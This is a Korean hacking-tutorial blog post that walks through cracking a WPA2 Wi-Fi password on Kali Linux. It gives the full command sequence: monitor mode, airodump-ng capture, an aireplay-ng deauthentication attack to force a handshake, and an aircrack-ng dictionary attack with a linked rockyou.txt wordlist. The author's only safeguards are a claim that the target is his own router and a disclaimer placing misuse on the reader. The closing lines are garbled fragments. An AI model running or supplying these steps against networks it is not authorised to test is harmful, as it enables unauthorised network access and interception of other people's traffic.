Story of CowHacker

해킹 해보기 3편 [와이파이 비밀번호 뚫기] 본문

공부/해킹스토리

해킹 해보기 3편 [와이파이 비밀번호 뚫기]

Cow_Hacker 2022. 1. 19. 19:47
728x90

안녕하세요 CowHacker입니다.

 

 

※ 해당 포스팅 글을 통해 악용할 시 100% 본인 책임입니다. 

 

 

 

 

와이파이를 해킹해보겠다.

 

준비물

 

1. 칼리 리눅스

2. 모니터 모드를 지원하는 무선랜 카드

3. rockyou.txt 파일

 

 

 

 

 

1번 준비물 링크

https://cowhacker.tistory.com/141?category=884404 

 

Kali 리눅스 설치

안녕하세요 CowHacker입니다. 오늘은 Kali 리눅스를 설치해볼 거다. 설치 전 본인의 컴퓨터에 가상 머신이 설치돼있어야 한다. 안돼 있다면, https://cowhacker.tistory.com/121?category=884404 가상 머신 설치하..

cowhacker.tistory.com

 

 

 

 

 

 

2번 준비물 링크

https://www.coupang.com/vp/products/2261696511?vendorItemId=71214571798&sourceType=MyCoupang_my_orders_list_product_title&isAddedCart= 

 

ipTIME N150UA2 USB 2.0 무선 랜카드 노트북용

COUPANG

www.coupang.com

 

 

 

 

 

 

3번 준비물 링크

https://drive.google.com/file/d/16u9lOd7zuR9Q-CZycTHGhQYGVXFfHOwN/view?usp=sharing 

 

rockyou.txt

 

drive.google.com

 

 

 

 

 

먼저 칼리 리눅스의 터미널에서

ifconfig 명령어를 입력해본다.

위 사진과 같이 eth0과 lo 두 개 만 뜨는 걸 확인할 수 있다.

 

 

 

 

모니터링 지원되는 무선 랜카드를 꽂는다.

그리고 다시 한번 ifconfig를 입력해본다.

 

 

 

 

 

 

 

 

eth0, lo, wlan0 3개가 뜨는 걸 확인할 수 있는데

여기서 wlan0이 핵심이다.

 

 

 

 

 

 

 

iwconfig를 입력해본다.

 

지금 wlan0의 모드는 Managed 모드인걸 확인할 수 있는데, 이것을 모니터 모드로 전환시켜 주는 작업을 할 것이다.

 


iwconfig란?

 

iwconfig는 ifconfig처럼 랜카드 정보를 볼 수 있는데, iwconfig는 무선 랜카드의 정보와 관리를 할 수 있는 명령어다.

 


 

 

 

 

 


sudo ifconfig wlan0 down

 

sudo iwconfig wlan0 mode moniter

 

sudo ifconfig wlan0 up

 

iwconfig

 


 

위 명령어를 차례대로 입력하면 모니터 모드로 전환된 걸 확인할 수 있다.

 

 

 

 

 

 

 

자! 이제 해킹 시작이다.

 

 

나는 지금 인터넷 사용이 안 되는 상황이다.

여기서부터 시작해보겠다.

 

 

 

 

 

 

 

 


sudo airodump-ng wlan0


위 명령어는 와이어 샤크의 기능인 스니핑을 하는 명령어다. 입력한다.

 

 

 

 

 

 

 

 

그럼 무선 랜카드가 스니핑 한 값을 보여준다.

나는 네모 친 부분 c.h_wifi ( 내 집 공유기다. )라는 와이파이를 해킹해볼 거다.

 

 

 

 

 

 

 


 

sudo airodump-ng -c [채널번호] --bssid [MAC주소] -w [저장할 파일 이름 및 저장할 경로 설정] (경로생략시 명령어 쳣던 곳위치에 저장) [무선랜 카드 명]


명령어 설명을 하자면

airodump == LAN 분석 명령어

-c == 해당 채널 번호로 분석하겠다.

--bssid == 해당 와이파이의 MAC 주소로 분석하겠다.

-w == 분석한 파일명 및 경로를 설정하겠다.

무선랜 카드 장치명 == 이 장치로 분석을 하겠다.

 

 

 

 

 

 

 

그럼 밑 부분을 보면 내가 해킹하려는 c.h_wifi에 접속한 사람이 보일 거다. 빨간색 네모친 부분! ( 사실 내 핸드폰이다. )

이 녀석의 인증 패턴을 수집하기 위해 2~7분 정도 있다가

 

 

밑에 명령어를 입력한다.

 

 

 

 

 

 


sudo aireplay-ng -0 5 -a2 [해킹 하려는 wifi의 MAC주소] -c [접속하고 있는 사람의 MAC 주소] [사용할 무선랜카드]


명령어 소개를 하기에 앞서 이건 핸드 셰이킹을 악용 ( 핸드 셰이크 인증을 강제로 해제 법 ) 하는 방법이다

 

aireplay-ng -0 5 == 몇 번 핸드 셰이킹을 끊을 것인가를 설정한다.

-a2 == WPA2를 해킹할 때 쓴다. ( -a == WPA1 을 해킹할때 쓴다. )

-c == 인증을 훔칠 녀석의 MAC 주소를 설정한다. ( 빨간색 네모친 부분! )

 

 

 

 

 

 

 

 

 

 

 

위 사진처럼 여러 번 입력을 하는데, 만약 한번 입력 시

 

 

 

 

 

아까 처음 스니핑 명령어를 친 화면에서

 

 

 

 

이와 같은 WPA handshake가 떴다면 성공이다.

 

 

 

 

 

 

 

 

 

자 그럼 한번 ls를 입력해서 분석한 파일이 저장됐는지 확인해본다.

난 입력한 대로 wpa라는 파일로 저장돼있다.

 

 

 

 

 

 

그중에서 나는. cap 즉 피캡 파일만 쓰윽 꺼내 갈 거다.

어디로? 3번 준비물이 있는 곳으로 말이다.

 

 

 

 

나란히 같은 곳에 놔둔다.

아 그전에 이름을 바꾸도록 한다. -01처럼 특수문자 없는 녀석으로다가!!!

 

 

 

 

 

 

 

 

 

 


sudo aircrack-ng -a2 -b [해킹하려는 wifi MAC주소] -w [사전비밀번호 파일 이름] [비밀번호를 풀려는 피캡파일 이름]


위에서 해킹하려는 wifi MAC 주소는 처음 스니핑 해서 나왔던 MAC 주소다.

접속하고 있는 사람의 MAC 주소가 아니다!

 

 

 

 

 

 

 

그럼 이제 비밀번호를 유추해 나간다.

 

 

 

 

 

 

 

 

 

 

유추가 끝나면 위와 같이 KEY FOUND! [ wifi 비밀번호 ] 

라고 뜬다.

 

 

 

 

 

 

 

 

이제 한번 연결해볼까?

 

 

해킹 성공이다.

 

 

 

 

※ 해당 포스팅 글을 통해 악용할 시 100% 본인 책임입니다. 

 

 

 

이파이의

윤은

급적

지만

 

밀호를 비

번호 답지 않은

호로 설정하면

시탐탐 노리는 해커에게

 

리는

회를 주게 된다.

728x90
Comments